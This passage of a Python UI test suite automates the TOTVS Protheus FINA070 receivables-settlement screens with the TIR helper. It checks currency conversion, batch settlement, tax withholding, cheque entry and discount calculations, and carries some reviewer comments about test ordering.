        self.oHelper.SetButton("Fechar")
        self.oHelper.AssertTrue()
        #self.oHelper.AddParameterReset()
### CT206
### TIR - Settlement with bank in currency 1 and title in currency 5 (MV_MOEDBCO = .T.)
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/GTSER-T42940
def test_FINA070_CT206(self):
    """Settle a currency-5 title through a currency-1 bank and verify the
    contracted rate and received amounts.

    Relies on MV_MOEDBCO having been set by CT198 (see the commented-out
    AddParameter below) -- NOTE(review): order-dependent.
    """
    prefixo = "RIC"
    titulo = "RIC018263"
    parcela = " "
    tipo = "NF "
    banco = "RIC"
    agencia = "M1"
    conta = "0"
    data = "01/06/2019"
    # self.oHelper.AddParameter("MV_MOEDBCO", "", ".T.", ".T.", ".T.")
    # self.oHelper.SetParameters()
    self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
    self.oHelper.SetButton("Baixar")
    self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
    self.oHelper.SetValue("Mot.Baixa", "NORMAL")
    self.oHelper.SetValue("Banco", banco)
    self.oHelper.SetValue("Agência", agencia)
    self.oHelper.SetValue("Conta", conta)
    self.oHelper.SetValue("Data Receb.", data)
    self.oHelper.SetValue("Data Crédito", data)
    self.oHelper.CheckResult("Taxa contratada", "5,0000")
    self.oHelper.CheckResult("= Valor Recebido", "20000,00")
    self.oHelper.CheckResult("Valor IEN", "4000,00")
    self.oHelper.SetButton("Salvar")
    self.oHelper.AssertTrue()
    #self.oHelper.AddParameterReset()
### CT208
### Settlement of a currency-1 title through a currency-2 bank.
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/GTSER-T42944
def test_FINA070_CT208(self):
    """Settle a currency-1 title in a currency-2 bank account and verify the
    received amount and its BRL ("Valor R$") conversion.
    """
    prefixo = "FIN"
    titulo = "M1XX19447"
    parcela = " "
    tipo = "NF "
    banco = "FIN"
    agencia = "FINM2"
    conta = "001"
    data = "30/07/2019"
    #self.oHelper.AddParameter("MV_MOEDBCO", "", ".T.", ".T.", ".T.") set in test CT206
    #self.oHelper.SetParameters()
    self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
    self.oHelper.SetButton("Baixar")
    self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
    self.oHelper.SetValue("Mot.Baixa", "NORMAL")
    self.oHelper.SetValue("Banco", banco)
    self.oHelper.SetValue("Agência", agencia)
    self.oHelper.SetValue("Conta", conta)
    self.oHelper.SetValue("Data Receb.", data)
    self.oHelper.SetValue("Data Crédito", data)
    self.oHelper.CheckResult("= Valor Recebido", "1500,00")
    self.oHelper.CheckResult("Valor R$", "6000,00")
    self.oHelper.SetButton("Salvar")
    self.oHelper.AssertTrue()
    # self.oHelper.AddParameterReset()
### CT207
### TIR - Settlement of a title carrying accessory values ("Valores Acessórios").
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/GTSER-T42942
def test_FINA070_CT207(self):
    """Edit the accessory values grid during settlement and verify the
    "+ Valores Acessórios" and "= Valor Recebido" totals update accordingly.
    """
    prefixo = "FIN"
    titulo = "000000101"
    parcela = "1"
    tipo = "NF "
    banco = "FIN"
    agencia = "00010"
    conta = "0000000000"
    data = "17/04/2019"
    self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
    self.oHelper.SetButton("Baixar")
    self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
    self.oHelper.CheckResult("+ Valores Acessórios", "1000,00")
    self.oHelper.CheckResult("= Valor Recebido", "2000,00")
    self.oHelper.SetValue("Mot.Baixa", "NORMAL")
    self.oHelper.SetValue("Banco", banco)
    self.oHelper.SetValue("Agência", agencia)
    self.oHelper.SetValue("Conta", conta)
    self.oHelper.SetValue("Data Receb.", data)
    self.oHelper.SetValue("Data Crédito", data)
    self.oHelper.SetButton("Outras Ações", "Valores Acessórios")
    self.oHelper.WaitShow("Contas a Receber - Valores Acessórios - Alteração")
    self.oHelper.SetValue("FKD_VLINFO", "500,00", grid=True, name_attr=True, row=1)
    self.oHelper.SetValue("FKD_VLINFO", "0,00", grid=True, name_attr=True, row=2)
    self.oHelper.LoadGrid()
    self.oHelper.SetButton("Confirmar")
    self.oHelper.CheckHelp("Registro alterado com sucesso.","Fechar")
    self.oHelper.CheckResult("+ Valores Acessórios", "500,00")
    self.oHelper.CheckResult("= Valor Recebido", "1500,00")
    # NOTE(review): AssertTrue() runs before the final "Salvar" click, unlike
    # every other test here -- confirm whether this ordering is intentional.
    self.oHelper.AssertTrue()
    self.oHelper.SetButton("Salvar")
### CT093
### Batch settlement ("baixa por lote").
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/GTSER-T15110
def test_FINA070_CT093(self):
    """Settle three titles in a single batch, then cancel the settlement of
    one title and attempt to delete another, expecting the VLDBXLOTE help
    message (deletion blocked while part of a settled batch).
    """
    banco = '161'
    agencia = '00161'
    conta = '0000000161'
    ntitulos = '3'
    lote = 'LT161'
    natureza = 'FIN161'
    dataDe = '01/10/2016'
    dataAte = '31/12/2016'
    prefixo = "161"
    titulo = "FIN000001"
    titulo2 = "FIN000002"
    parcela = " "
    tipo = "NF "
    self.oHelper.SetButton("Outras Ações", "Lote")
    self.oHelper.SetValue("cBancolt", banco, name_attr=True)
    self.oHelper.SetValue("cAgencialt", agencia, name_attr=True)
    self.oHelper.SetValue("cContalt", conta, name_attr=True)
    self.oHelper.SetValue("nNroTit", ntitulos, name_attr=True)
    self.oHelper.SetValue("cLoteFin", lote, name_attr=True)
    self.oHelper.SetValue("cNaturLote", natureza, name_attr=True)
    self.oHelper.SetValue("dVencDe", dataDe, name_attr=True)
    self.oHelper.SetValue("dVencAte", dataAte, name_attr=True)
    self.oHelper.SetValue("cNatDe", natureza, name_attr=True)
    self.oHelper.SetValue("cNatAte", natureza, name_attr=True)
    self.oHelper.SetButton("Ok")
    self.oHelper.SetButton("Salvar")
    self.oHelper.ClickBox("Filial", select_all=True)
    self.oHelper.SetButton("Salvar")
    # One Salvar per title in the batch; the cumulative total grows by
    # 10.000,00 for each of the three titles.
    self.oHelper.CheckResult("nValRec", "10.000,99", name_attr=True)
    self.oHelper.SetValue("cMotBx", "NORMAL", name_attr=True)
    self.oHelper.SetButton("Salvar")
    self.oHelper.CheckResult("nValRec", "20.000,99", name_attr=True)
    self.oHelper.SetValue("cMotBx", "NORMAL", name_attr=True)
    self.oHelper.SetButton("Salvar")
    self.oHelper.CheckResult("nValRec", "30.000,99", name_attr=True)
    self.oHelper.SetValue("cMotBx", "NORMAL", name_attr=True)
    self.oHelper.SetButton("Salvar")
    self.oHelper.CheckHelp(text='TOTGERAL',button='Fechar')
    self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
    self.oHelper.SetButton("Outras Ações", "Canc Baixa")
    self.oHelper.SetButton("Confirmar")
    self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo2}{parcela}{tipo}")
    self.oHelper.SetButton("Outras Ações", "Excluir")
    self.oHelper.SetButton("Confirmar")
    self.oHelper.CheckHelp(text='VLDBXLOTE',button='Fechar')
    self.oHelper.AssertTrue()
### CT220
### Validations on the cheque dialog during settlement.
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/GTSER-T44213
def test_FINA070_CT220(self):
    """Exercise the cheque entry dialog (CMC7 input, cancel/confirm paths),
    settle the title, then cancel the settlement.

    Relies on MV_CMC7FIN having been set by CT198 (see commented-out
    AddParameter) -- NOTE(review): order-dependent.
    """
    prefixo = "FIN"
    titulo = "TIRCHEQUE"
    parcela = " "
    tipo = "NF "
    # self.oHelper.AddParameter("MV_CMC7FIN", "", "S", "S", "S")
    # self.oHelper.SetParameters()
    self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
    self.oHelper.SetButton("Baixar")
    self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
    self.oHelper.SetValue("Mot.Baixa", "NORMAL")
    self.oHelper.SetButton("Outras Ações", "Cheque(s)")
    self.oHelper.SetButton("Outras Ações", "CMC7")
    self.oHelper.SetValue("cCmc7", "<TIRTIR00<0180001265<577508114673:", name_attr=True)
    self.oHelper.SetButton("Ok")
    self.oHelper.SetButton("Parâmetros")
    self.oHelper.SetKey("ESC")
    self.oHelper.SetButton("Cancelar")
    self.oHelper.CheckHelp(text='Cheques recebidos',button='Sim')  # "Add more cheques?" prompt
    self.oHelper.SetValue("cCmc7", "<TIRTIR00<0180001265<577508114673:", name_attr=True)
    self.oHelper.SetButton("Ok")
    self.oHelper.SetValue("Valor Nominal", "500,00")
    self.oHelper.SetButton("Ok")
    self.oHelper.SetButton("Não")
    self.oHelper.SetValue("Valor ref. baixa", "1.000,00", grid=True, row=1)
    self.oHelper.LoadGrid()
    self.oHelper.SetButton("Salvar")
    self.oHelper.SetButton("Salvar")
    self.oHelper.SetButton("Outras Ações", "Canc Baixa")
    self.oHelper.SetButton("Ok")
    self.oHelper.SetButton("Confirmar")
    self.oHelper.AssertTrue()
### CT261
### PCC under the old rule.
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/GTSER-T49802
def test_FINA070_CT261(self):
    """Verify PIS/COFINS/CSLL withholding: first computed under the new PCC
    rule, then zeroed after value changes because the old-rule minimum for
    withholding is no longer reached. Settlement is cancelled at the end.
    """
    prefixo = "FIN"
    titulo = "TITANTTIR"
    parcela = " "
    tipo = "NF "
    data = '11/06/2015'
    self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
    self.oHelper.SetButton("Baixar")
    self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
    self.oHelper.SetValue("Mot.Baixa", "NORMAL")
    self.oHelper.SetValue("Data Receb.", data)
    self.oHelper.SetValue("Data Crédito", data)
    # Check the amounts calculated under the new PCC rule
    self.oHelper.CheckResult("- Pis", "14,30")
    self.oHelper.CheckResult("- Cofins", "22,00")
    self.oHelper.CheckResult("- Csll", "66,00")
    # Under the old PCC rule the minimum amount for withholding is not reached
    self.oHelper.SetValue("- Descontos", "25,00")
    self.oHelper.SetValue("+ Multa", "83,00")
    self.oHelper.SetValue("+ Tx.Permanenc.", "25,00")
    self.oHelper.SetValue("= Valor Recebido", "2.250,00")
    self.oHelper.CheckResult("- Pis", "0,00")
    self.oHelper.CheckResult("- Cofins", "0,00")
    self.oHelper.CheckResult("- Csll", "0,00")
    self.oHelper.SetButton("Salvar")
    self.oHelper.SetButton("Outras Ações", "Canc Baixa")
    self.oHelper.SetButton("Confirmar")
    self.oHelper.AssertTrue()
### CT260
### Changing taxes at settlement time.
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/GTSER-T49799
def test_FINA070_CT260(self):
    """Perform a partial settlement (5.000,00), then a second settlement
    where accumulated tax abatement (615,00) reduces the received amount,
    and finally cancel both settlements.

    Relies on MV_MULNATR/MV_IMPBXCR set by CT198 (see commented-out
    AddParameter calls) -- NOTE(review): order-dependent.
    """
    prefixo = "FIN"
    titulo = "000000207"
    parcela = "1"
    tipo = "NF "
    data = "24/03/2020"
    # self.oHelper.AddParameter("MV_MULNATR", "", ".T.", ".T.", ".T.")
    # self.oHelper.AddParameter("MV_IMPBXCR", "", "2", "2", "2")
    # self.oHelper.SetParameters()
    self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
    self.oHelper.SetButton("Baixar")
    self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
    self.oHelper.SetValue("Mot.Baixa", "NORMAL")
    self.oHelper.SetValue("Data Receb.", data)
    self.oHelper.SetValue("Data Crédito", data)
    self.oHelper.SetValue("", True)  # multi-nature apportionment checkbox
    self.oHelper.SetValue("nValRec" , "5.000,00", name_attr=True)
    self.oHelper.SetButton("Salvar")  # settlement screen
    self.oHelper.SetButton("Salvar")  # apportionment screen
    #self.oHelper.SetButton("Baixar")
    #self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
    #self.oHelper.SetButton("Outras Ações", "Impostos")
    #self.oHelper.SetValue("nOrigPis" , "60,00" , name_attr=True)
    #self.oHelper.SetValue("nOrigCofins" , "250,00" , name_attr=True)
    #self.oHelper.SetValue("nOrigCsll" , "190,00" , name_attr=True)
    #self.oHelper.SetButton("Salvar")
    #self.oHelper.SetButton("Sim")
    self.oHelper.SetButton("Baixar")
    self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
    self.oHelper.SetValue("Mot.Baixa", "NORMAL")
    self.oHelper.SetValue("Data Receb.", data)
    self.oHelper.SetValue("Data Crédito", data)
    self.oHelper.SetValue("", True)  # multi-nature apportionment checkbox
    self.oHelper.CheckResult("nTotAbImp", "615,00" , name_attr=True)
    self.oHelper.CheckResult("nValRec" , "4.385,00", name_attr=True)
    self.oHelper.SetButton("Salvar")  # settlement screen
    self.oHelper.SetButton("Salvar")  # apportionment screen
    self.oHelper.SetButton("Outras Ações", "Canc Baixa")
    self.oHelper.ClickListBox("FIN 000000207 1 NF FIN292 01 24/03/2020 4.385,00 02")
    self.oHelper.SetButton("Ok")
    self.oHelper.SetButton("Confirmar")
    self.oHelper.SetButton("Outras Ações", "Canc Baixa")
    self.oHelper.SetButton("Confirmar")
    self.oHelper.AssertTrue()
### CT152
### Withholding-consultation screen only.
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/GTSER-T34862
def test_FINA070_CT152(self):
    """Read-only check of the "Consulta de Retenções" grid: verify the
    calculated value on each of the first five grid lines, then close.
    """
    prefixo = "FIN"
    titulo = "A110CT35A"
    parcela = " "
    tipo = "NF "
    self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
    self.oHelper.SetButton("Outras Ações", "Consulta de Retenções")
    self.oHelper.CheckResult("Valor Calc.", "300,00", grid=True, line=1, grid_number=1)
    self.oHelper.LoadGrid()
    self.oHelper.CheckResult("Valor Calc.", "100,00", grid=True, line=2, grid_number=1)
    self.oHelper.LoadGrid()
    self.oHelper.CheckResult("Valor Calc.", "1.100,00", grid=True, line=3, grid_number=1)
    self.oHelper.LoadGrid()
    self.oHelper.CheckResult("Valor Calc.", "150,00", grid=True, line=4, grid_number=1)
    self.oHelper.LoadGrid()
    self.oHelper.CheckResult("Valor Calc.", "65,00", grid=True, line=5, grid_number=1)
    self.oHelper.LoadGrid()
    #self.oHelper.CheckResult("Valor Calc.", "300,00", grid=True, line=1, grid_number=2)
    #self.oHelper.LoadGrid()
    self.oHelper.SetButton("Fechar")
    self.oHelper.AssertTrue()
### CT263
### Batch settlement of a title that already had a partial settlement.
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/GTSER-T49906
def test_FINA070_CT263(self):
    """Batch-settle a partially settled title with interest/fine/discount
    adjustments, verify withholding totals, then cancel: the first cancel
    attempt triggers FINIMPBX, the second succeeds via the list selection.
    """
    banco = 'CX1'
    agencia = '00001'
    conta = '0000000001'
    ntitulos = '1'
    lote = 'LT070'
    natureza = 'FIN0000105'
    dataDe = '27/03/2020'
    dataAte = '27/03/2020'
    data = '28/03/2020'
    prefixo = "FIN"
    titulo = "000000208"
    parcela = "1"
    tipo = "NF "
    self.oHelper.AddParameter("MV_IMPBAIX", "", "1", "1", "1")
    # self.oHelper.AddParameter("MV_BR10925", "", "1", "1", "1")
    self.oHelper.SetParameters()
    self.oHelper.SetButton("Outras Ações", "Lote")
    self.oHelper.SetValue("cBancolt", banco, name_attr=True)
    self.oHelper.SetValue("cAgencialt", agencia, name_attr=True)
    self.oHelper.SetValue("cContalt", conta, name_attr=True)
    self.oHelper.SetValue("nNroTit", ntitulos, name_attr=True)
    self.oHelper.SetValue("cLoteFin", lote, name_attr=True)
    self.oHelper.SetValue("cNaturLote", natureza, name_attr=True)
    self.oHelper.SetValue("dVencDe", dataDe, name_attr=True)
    self.oHelper.SetValue("dVencAte", dataAte, name_attr=True)
    self.oHelper.SetValue("cNatDe", natureza, name_attr=True)
    self.oHelper.SetValue("cNatAte", natureza, name_attr=True)
    self.oHelper.SetButton("Ok")
    self.oHelper.SetButton("Salvar")
    self.oHelper.ClickBox("Filial", select_all=True)
    self.oHelper.SetButton("Salvar")
    self.oHelper.SetValue("Mot.Baixa", "NORMAL")
    self.oHelper.SetValue("Data Receb.", data)
    self.oHelper.SetValue("Data Crédito", data)
    # NOTE(review): nJuros/nMulta/nDescont are set three times with varying
    # values; presumably the screen recalculates between entries and only the
    # last set (25/25/50) is effective -- confirm against the test case.
    self.oHelper.SetValue("nJuros", "25,00", name_attr=True)
    self.oHelper.SetValue("nMulta", "25,00", name_attr=True)
    self.oHelper.SetValue("nDescont", "50,00", name_attr=True)
    self.oHelper.SetValue("nJuros", "10,00", name_attr=True)
    self.oHelper.SetValue("nMulta", "10,00", name_attr=True)
    self.oHelper.SetValue("nDescont", "10,00", name_attr=True)
    self.oHelper.SetValue("nJuros", "25,00", name_attr=True)
    self.oHelper.SetValue("nMulta", "25,00", name_attr=True)
    self.oHelper.SetValue("nDescont", "50,00", name_attr=True)
    self.oHelper.CheckResult("- Pis", "32,50")
    self.oHelper.CheckResult("- Cofins", "150,00")
    self.oHelper.CheckResult("- Csll", "50,00")
    self.oHelper.CheckResult("= Valor Recebido", "4.385,00")
    self.oHelper.SetButton("Salvar")
    self.oHelper.CheckHelp(text='TOTGERAL',button='Fechar')
    self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
    self.oHelper.SetButton("Outras Ações", "Canc Baixa")
    self.oHelper.SetButton("Ok")
    self.oHelper.CheckHelp(text='FINIMPBX',button='Fechar')
    self.oHelper.SetButton("Outras Ações", "Canc Baixa")
    self.oHelper.ClickListBox("FIN 000000208 1 NF FIN292 01 28/03/2020 4.385,00 03")
    self.oHelper.SetButton("Ok")
    self.oHelper.SetButton("Confirmar")
    self.oHelper.CheckHelp(text='TOTVS',button='Sim')
    self.oHelper.SetButton("Outras Ações", "Canc Baixa")
    self.oHelper.SetButton("Confirmar")
    self.oHelper.AssertTrue()
### CT150
### Tax-withholding screen at settlement time.
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/GTSER-T34860
def test_FINA070_CT150(self):
    """Open "Retenção de impostos" during settlement, override the amount to
    withhold (16,50 -> 50,00), confirm, and verify "- Retenções" reflects it.
    The settlement itself is cancelled at the end.
    """
    prefixo = "FIN"
    titulo = "A110CT34A"
    parcela = " "
    tipo = "NF "
    self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
    self.oHelper.SetButton("Baixar")
    self.oHelper.SetButton("Outras Ações", "Retenção de impostos")
    self.oHelper.CheckResult("Valor Calculado", "16,50", grid=True, line=1, grid_number=1)
    self.oHelper.LoadGrid()
    self.oHelper.SetValue("Valor a Reter", "50,00", grid=True)
    self.oHelper.LoadGrid()
    self.oHelper.SetButton("Confirmar")
    self.oHelper.SetButton("Fechar")
    self.oHelper.CheckResult("- Retenções", "50,00")
    self.oHelper.SetButton("Cancelar")
    self.oHelper.AssertTrue()
### CT274
### Settlement screen only: changing banks and the effect on the credit date.
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/GTSER-T34860
def test_FINA070_CT274(self):
    """Verify "Data Crédito" recalculation when switching banks: bank 022
    pushes the credit date two days ahead of receipt; switching to CX1
    brings it back to the receipt date. Nothing is saved.
    """
    prefixo = "FIN"
    titulo = "A110CT34A"
    parcela = " "
    tipo = "NF "
    banco = "CX1"
    agencia = "00001"
    conta = "0000000001"
    data = "11/05/2020"
    self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
    self.oHelper.SetButton("Baixar")
    self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
    self.oHelper.SetValue("Mot.Baixa", "NORMAL")
    self.oHelper.SetValue("Banco", "022")
    self.oHelper.SetValue("Agência", "022")
    self.oHelper.SetValue("Conta", "022")
    self.oHelper.SetValue("Data Receb.", data)
    self.oHelper.CheckResult("Data Crédito", '13/05/2020')
    self.oHelper.SetValue("Banco", banco)
    self.oHelper.SetValue("Agência", agencia)
    self.oHelper.SetValue("Conta", conta)
    self.oHelper.CheckResult("Data Crédito", data)
    self.oHelper.SetButton("Cancelar")
    self.oHelper.AssertTrue()
### CT279
### TIR - Settlement with discount proportional to the settled amount (MV_DESCFIN = 'P').
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/GTSER-T42940
def test_FINA070_CT279(self):
    """With MV_DESCFIN = 'P', re-enter the received amount several times and
    verify the discount is recalculated proportionally (400,00 entered ->
    360,00 received with 40,00 discount). Nothing is saved.
    """
    prefixo = "DSC"
    titulo = "FINDSCPRP"
    parcela = " "
    tipo = "NF "
    banco = "001"
    agencia = "001"
    conta = "001"
    data = "01/06/2019"
    self.oHelper.AddParameter("MV_DESCFIN", "", "P", "P", "P")
    self.oHelper.SetParameters()
    self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
    self.oHelper.SetButton("Baixar")
    self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
    self.oHelper.SetValue("Mot.Baixa", "NORMAL")
    self.oHelper.SetValue("Banco", banco)
    self.oHelper.SetValue("Agência", agencia)
    self.oHelper.SetValue("Conta", conta)
    self.oHelper.SetValue("Data Receb.", data)
    self.oHelper.SetValue("Data Crédito", data)
    self.oHelper.SetValue("= Valor Recebido", "500,00")
    self.oHelper.SetValue("= Valor Recebido", "300,00")
    self.oHelper.SetValue("= Valor Recebido", "400,00")
    self.oHelper.CheckResult("= Valor Recebido", "360,00")
    self.oHelper.CheckResult("- Descontos", "40,00")
    self.oHelper.SetButton("Cancelar")
    self.oHelper.AssertTrue()
### CT297
### TIR - CT297 - "Impostos" (taxes) button.
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/project/10231/testCase?folderId=2595
def test_FINA070_CT297(self):
    """Override PIS in the "Impostos" dialog and verify the received amount
    updates both inside the dialog and back on the settlement screen.
    Nothing is saved (final Cancelar).
    """
    prefixo = "FIN"
    titulo = "TIR070400"
    parcela = " "
    tipo = "NF "
    banco = "001"
    agencia = "001"
    conta = "001"
    data = "07/12/2020"
    self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
    self.oHelper.SetButton("Baixar")
    self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
    self.oHelper.SetValue("Mot.Baixa", "NORMAL")
    self.oHelper.SetValue("Banco", banco)
    self.oHelper.SetValue("Agência", agencia)
    self.oHelper.SetValue("Conta", conta)
    self.oHelper.SetValue("Data Receb.", data)
    self.oHelper.SetValue("Data Crédito", data)
    self.oHelper.SetButton("Outras Ações", "Impostos")
    self.oHelper.SetValue("PIS", "50,00")
    self.oHelper.CheckResult("Valor Recebido", "8.300,00")
    self.oHelper.SetButton("Salvar")
    self.oHelper.CheckHelp(text='TOTVS',button='Sim')  # "Confirm change of tax amounts?" prompt
    self.oHelper.CheckResult("= Valor Recebido", "8.300,00")
    self.oHelper.SetButton("Cancelar")
    self.oHelper.AssertTrue()
### CT298
### TIR - Open and cancel the "Impostos" dialog with MV_BR10925 = 1.
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/project/10231/testCase?folderId=2595
def test_FINA070_CT298(self):
    """Smoke test: with MV_BR10925 = 1, open the "Impostos" dialog during
    settlement and cancel out of both the dialog and the settlement.
    """
    prefixo = "001"
    titulo = "FIN90F "
    parcela = " "
    tipo = "NF "
    banco = "001"
    agencia = "001"
    conta = "001"
    data = "09/12/2020"
    self.oHelper.AddParameter("MV_BR10925", "", "1", "1", "1")
    self.oHelper.SetParameters()
    self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
    self.oHelper.SetButton("Baixar")
    self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
    self.oHelper.SetValue("Mot.Baixa", "NORMAL")
    self.oHelper.SetValue("Banco", banco)
    self.oHelper.SetValue("Agência", agencia)
    self.oHelper.SetValue("Conta", conta)
    self.oHelper.SetValue("Data Receb.", data)
    self.oHelper.SetValue("Data Crédito", data)
    self.oHelper.SetButton("Outras Ações", "Impostos")
    self.oHelper.SetButton("Cancelar")
    self.oHelper.SetButton("Cancelar")
    self.oHelper.AssertTrue()
### CT299
### TIR - View then settle with a manually entered fine ("+ Multa").
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/project/10231/testCase?folderId=2595
def test_FINA070_CT299(self):
    """Open the title in view mode, then on the settlement screen enter a
    100,00 fine and verify the received total (10.500,00). Nothing is saved.
    """
    prefixo = "FIN"
    titulo = "FIN070402"
    parcela = " "
    tipo = "NF "
    banco = "FIN"
    agencia = "001"
    conta = "FIN006"
    data = "09/12/2020"
    self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
    self.oHelper.SetButton("Visualizar")
    self.oHelper.SetButton("Cancelar")
    self.oHelper.SetButton("Baixar")
    self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
    self.oHelper.SetValue("+ Multa", "100,00")
    self.oHelper.SetValue("Mot.Baixa", "NORMAL")
    self.oHelper.SetValue("Banco", banco)
    self.oHelper.SetValue("Agência", agencia)
    self.oHelper.SetValue("Conta", conta)
    self.oHelper.SetValue("Data Receb.", data)
    self.oHelper.SetValue("Data Crédito", data)
    self.oHelper.CheckResult("= Valor Recebido", "10.500,00")
    self.oHelper.SetButton("Cancelar")
    self.oHelper.AssertTrue()
### CT300
### TIR - Batch settlement with on-line accounting enabled (F12 routine parameters).
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/project/10231/testCase?folderId=2595
def test_FINA070_CT300(self):
    """Enable "Contabiliza On Line" via F12, then batch-settle one title and
    expect the TOTGERAL totals help dialog.
    """
    prefixo = "FIN"
    titulo = "FIN070403"
    parcela = " "
    tipo = "NF "
    banco = "001"
    agencia = "001"
    conta = "001"
    data = "11/12/2020"
    lote = 'RR951'
    ntitulos = '1'
    natureza = '004'
    self.oHelper.WaitShow("Baixa de Titulos")
    self.oHelper.SetKey("F12")
    self.oHelper.SetValue("Contabiliza On Line ?" ,"Sim")
    self.oHelper.SetButton('Ok')
    #self.oHelper.AddParameter("MV_BR10925", "", "1", "1", "1")
    #self.oHelper.SetParameters()
    #self.oHelper.WaitShow("Baixa de Títulos")
    self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
    self.oHelper.SetButton("Outras Ações", "Lote")
    self.oHelper.SetValue("cBancolt", banco, name_attr=True)
    self.oHelper.SetValue("cAgencialt", agencia, name_attr=True)
    self.oHelper.SetValue("cContalt", conta, name_attr=True)
    self.oHelper.SetValue("nNroTit", ntitulos, name_attr=True)
    self.oHelper.SetValue("cLoteFin", lote, name_attr=True)
    self.oHelper.SetValue("cNaturLote", natureza, name_attr=True)
    self.oHelper.SetValue("dVencDe", data, name_attr=True)
    self.oHelper.SetValue("dVencAte", data, name_attr=True)
    self.oHelper.SetValue("cNatDe", natureza, name_attr=True)
    self.oHelper.SetValue("cNatAte", natureza, name_attr=True)
    self.oHelper.SetButton("Ok")
    self.oHelper.SetButton("Salvar")
    # NOTE(review): select_all is toggled three times (odd count -> selected);
    # possibly a workaround for a flaky checkbox -- confirm intent.
    self.oHelper.ClickBox("Filial", select_all=True)
    self.oHelper.ClickBox("Filial", select_all=True)
    self.oHelper.ClickBox("Filial", select_all=True)
    self.oHelper.SetButton("Salvar")
    self.oHelper.CheckResult("nValRec", "4.385,00", name_attr=True)
    self.oHelper.SetValue("cMotBx", "NORMAL", name_attr=True)
    self.oHelper.SetButton("Salvar")
    self.oHelper.CheckHelp(text='TOTGERAL',button='Fechar')
    self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
    self.oHelper.AssertTrue()
### CT301
### TIR - Batch settlement of two titles with MV_BR10925 and MV_LOTEFIN set.
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/project/10231/testCase?folderId=2595
def test_FINA070_CT301(self):
    """Batch-settle two titles (9.385,00 then 4.385,00) with MV_BR10925 = 1
    and MV_LOTEFIN = S, expecting the TOTGERAL totals dialog at the end.
    """
    prefixo = "FIN"
    titulo = "FIN070L02"
    parcela = " "
    tipo = "NF "
    banco = "FIN"
    agencia = "FIN07"
    conta = "FIN070L01"
    data = "28/12/2020"
    lote = 'RR877'
    ntitulos = '2'
    natureza = '004'
    self.oHelper.AddParameter("MV_BR10925", "", "1", "1", "1")
    self.oHelper.AddParameter("MV_LOTEFIN", "", "S", "S", "S")
    self.oHelper.SetParameters()
    self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
    self.oHelper.SetButton("Outras Ações", "Lote")
    self.oHelper.SetValue("cBancolt", banco, name_attr=True)
    self.oHelper.SetValue("cAgencialt", agencia, name_attr=True)
    self.oHelper.SetValue("cContalt", conta, name_attr=True)
    self.oHelper.SetValue("nNroTit", ntitulos, name_attr=True)
    self.oHelper.SetValue("cLoteFin", lote, name_attr=True)
    self.oHelper.SetValue("cNaturLote", natureza, name_attr=True)
    self.oHelper.SetValue("dVencDe", data, name_attr=True)
    self.oHelper.SetValue("dVencAte", data, name_attr=True)
    self.oHelper.SetValue("cNatDe", natureza, name_attr=True)
    self.oHelper.SetValue("cNatAte", natureza, name_attr=True)
    self.oHelper.SetButton("Ok")
    self.oHelper.SetButton("Salvar")
    self.oHelper.ClickBox("Filial", select_all=True)
    self.oHelper.SetButton("Salvar")
